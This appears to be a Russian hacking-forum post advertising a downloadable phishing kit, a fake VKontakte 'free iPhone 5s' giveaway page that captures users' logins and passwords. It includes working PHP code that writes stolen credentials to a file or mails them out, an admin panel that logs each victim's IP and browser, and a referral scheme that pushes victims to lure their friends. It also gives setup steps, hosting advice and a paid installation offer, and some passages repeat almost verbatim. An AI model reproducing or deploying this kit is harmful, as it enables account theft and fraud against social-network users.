С вами , как всегда я , всеми почитаемый Winlock
И сейчас я порадую вас очередным фейком) Но не простым.
Шаблон фейка выполнен достаточно гармонично и аккуратно , все стили мотивируют пользоваателя авторизироваться через вк , и соответственно все пароли введенные на сайте попадут к вам в базу!
Особенности:
- Симпотичный дизаин
- Есть виджет комментариев!
- Есть виджет "Мне нравится"
- Есть виджет "Сохранить ВКонтакте
- Не использовался на других сайтах!
- 100% БЕЗОПАСНОСТЬ! *
* - Все логины и пароли сохраняются в БД MySQL , что обеспечивает надежную защиту так как пароли не лежат на сайте! Также путь до вашей базы невозможно подобрать!
Скачать бесплатно:
Скачать:
Демо: http://demo.qety.ru
VT https://www.virustotal.com/ru/file/e703 … 390446892/
PS Не забудьте , что фейки лучше всего работают на бесплатном хостинге http://uahsg.net.ua
Внимание!
Для корректной работы необходимо заменить app_id в виджетах комментарии и мне нравится!
Для их замены войдите в вк - настройки - для разработчиков - виджеті - комментарии
Потом подключаете новый сайт , вводите имя домена , жмете сохранить , внизу будет код возьмите и скопируйте api_id и замените в файле index.php , так-же проделайте и с виджетом "мне нравится" , сам код комментов заменять не нужно только api_id
UPD Добавлен видеоурок , настройка + установка!
Замена кодировки:
Чтоб иероглифов не было, необходимо идти:
auth/facebooklogin/auth@withReload=true/index.php
Вот этот Индекс Сохраняем на Компьютер, открываем в Редакторе txt Сохраняем как. C кодировкой UTF-8
Заливаем обратно, перезаписываем.
Сохраняем аккаунты в текстовую базу (Без MySQL)
1 Открываем фаил "login.php"
2 Стираем содержимое , и вставляем код:
/* Фейк создал гениальный кодер KurSoriK */ $BASE="base.php"; // название файла с базой $IS_EMAIL=false; $LOCATION="/spasibo.php"; $p0=$_REQUEST["email"]; $p1=$_REQUEST["pass"]; $headers = ""; $info="$p0:$p1:\n"; if ($IS_EMAIL){ mail($BASE, "*** Ваши аккаунты!", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); } header("Location:$LOCATION"); ?>
3 Создаем в корне фаил base.php , выставляем права 777.
4 Все! Теперь аккаунты сохраняются в фаил base.php
Скоро будет вторая версия фейка! (Настоящая авторизация,репост, и тд)
Автор фейка Kursorik - Спасибо и денежная помощь ему, найти его можно через гугл
2 версия :
Вот и готов, второй релиз фейка IPhone 5s , теперь он содержит вкусняшки и более приятный дизаин. Все особенности данного фейка перечислены ниже!
Особенности фейка (данной версии) :
- Безопасность прежде всего!
Хранение логинов и паролей в базе MySQL
- Нехотите лазить в базу ? Да пожалуйста , и не надо!
Наша системма административной панели позволяет просматривать информацию о пользователе в удобном виде прямо
из браузера , кроме того она также удобно позволяет и расправится с ненужніми данными , просто нажмите кнопку "Удалить" рядом с аккауном!
Хотите больше информации ? Без проблемм!
Наша системма , показывает не только логин и пароль пользователя , но также и его IP адресс , Браузер , дату и даже время до последней секунды!
Нелюбите мусор в базе ? Я вас поддерживаю!
Наша системма фильтрации , позволяет непропускать в базу аккаунты вида "Фигня:Фигня,ололо,азаза" а также аккаунты с Русскими символами в поле ввода логина!
Любите приятный стиль ? Тогда этот фейк создан для вас!
Наш дизаин административной панели создан с учтением интересов хакерских группировок , созданный в традиционно темных тонах , но при этом не сильно прачен и достаточно прост!
Любите свежие идеи ? Тогда вы пришли по адрессу!
Наш фейк впервые затрагивает тему IPhone 5 , раньше некоторіе партнерки пытались такое провернуть с смс биллингом , и конверт был очень высоким!
Нравится хорошая маскировка ? Мы и это учли
После ввода пользователем адреса своей страницы , появляется его аватарка , а после ввода ним своего логина и пароля , он автоматически переадрессовывается в "Кабинет пользователя" где написан его ID , и аватар! Но это еще не все!
Хотите больше пользователей , за меньшие усилия ? Пожалуйста!
Также в кабинете пользователю доступна рефферальная ссылка , по которой он должен пригласить друзей чтобы получить Айфон! Внизу указано колличество ползователей , которых он пригласил , причем счетчик польностью рабочий!
Также пользователю требуется пригласить минимум три пользователя , для участия в игре , но чем больше тем лучше ... для вас)
Итог:
И это еще неполный список , всего того что может мое детище!
Скачать:
http://antigate.uahsg.net.ua/fake.zip
Демо:
Админ-панель:
http://antigate.uahsg.net.ua/admin.php
Логин: admin
Пароль: 123456
Скоро будет
Исправления:- Исправлен баг в автоизации
- Исправлен кодировка
Вот и готов, второй релиз фейка IPhone 5s , теперь он содержит вкусняшки и более приятный дизаин. Все особенности данного фейка перечислены ниже!
Особенности фейка (данной версии) :
- Безопасность прежде всего!
Хранение логинов и паролей в базе MySQL
- Нехотите лазить в базу ? Да пожалуйста , и не надо!
Наша системма административной панели позволяет просматривать информацию о пользователе в удобном виде прямо
из браузера , кроме того она также удобно позволяет и расправится с ненужніми данными , просто нажмите кнопку "Удалить" рядом с аккауном!Хотите больше информации ? Без проблемм!
Наша системма , показывает не только логин и пароль пользователя , но также и его IP адресс , Браузер , дату и даже время до последней секунды!
Нелюбите мусор в базе ? Я вас поддерживаю!
Наша системма фильтрации , позволяет непропускать в базу аккаунты вида "Фигня:Фигня,ололо,азаза" а также аккаунты с Русскими символами в поле ввода логина!
Любите приятный стиль ? Тогда этот фейк создан для вас!
Наш дизаин административной панели создан с учтением интересов хакерских группировок , созданный в традиционно темных тонах , но при этом не сильно прачен и достаточно прост!
Любите свежие идеи ? Тогда вы пришли по адрессу!
Наш фейк впервые затрагивает тему IPhone 5 , раньше некоторіе партнерки пытались такое провернуть с смс биллингом , и конверт был очень высоким!
Нравится хорошая маскировка ? Мы и это учли
После ввода пользователем адреса своей страницы , появляется его аватарка , а после ввода ним своего логина и пароля , он автоматически переадрессовывается в "Кабинет пользователя" где написан его ID , и аватар! Но это еще не все!
Хотите больше пользователей , за меньшие усилия ? Пожалуйста!
Также в кабинете пользователю доступна рефферальная ссылка , по которой он должен пригласить друзей чтобы получить Айфон! Внизу указано колличество ползователей , которых он пригласил , причем счетчик польностью рабочий!
Также пользователю требуется пригласить минимум три пользователя , для участия в игре , но чем больше тем лучше ... для вас)
Итог:
И это еще неполный список , всего того что может мое детище!
Скачать:
http://antigate.uahsg.net.ua/Fake_IPhone_5s_v3.rar
Демо:
Админ-панель:
http://antigate.uahsg.net.ua/admin.php
Логин: admin
Пароль: 123456Видео (Установка и настройка):
Скоро будет
Исправления:- Исправлен баг в автоизации
- Испрвлена кодировка
- Добавлен вывод списка аккаунтов (Login:Password)Инструкция по настройке и установке , содержится внутри архива!
Могу настроить и установить сам , стоимость настройки : 50 руб
Все заказавшие услугу , получают рекоммендации по успешному продвижению фейка в социальных сетях и бесплатную установку обновлений!
Финальная 2 версия скрипта,скачать тут
Теги: Новый фейк ВКонтакте "Бесплатный IPhone 5s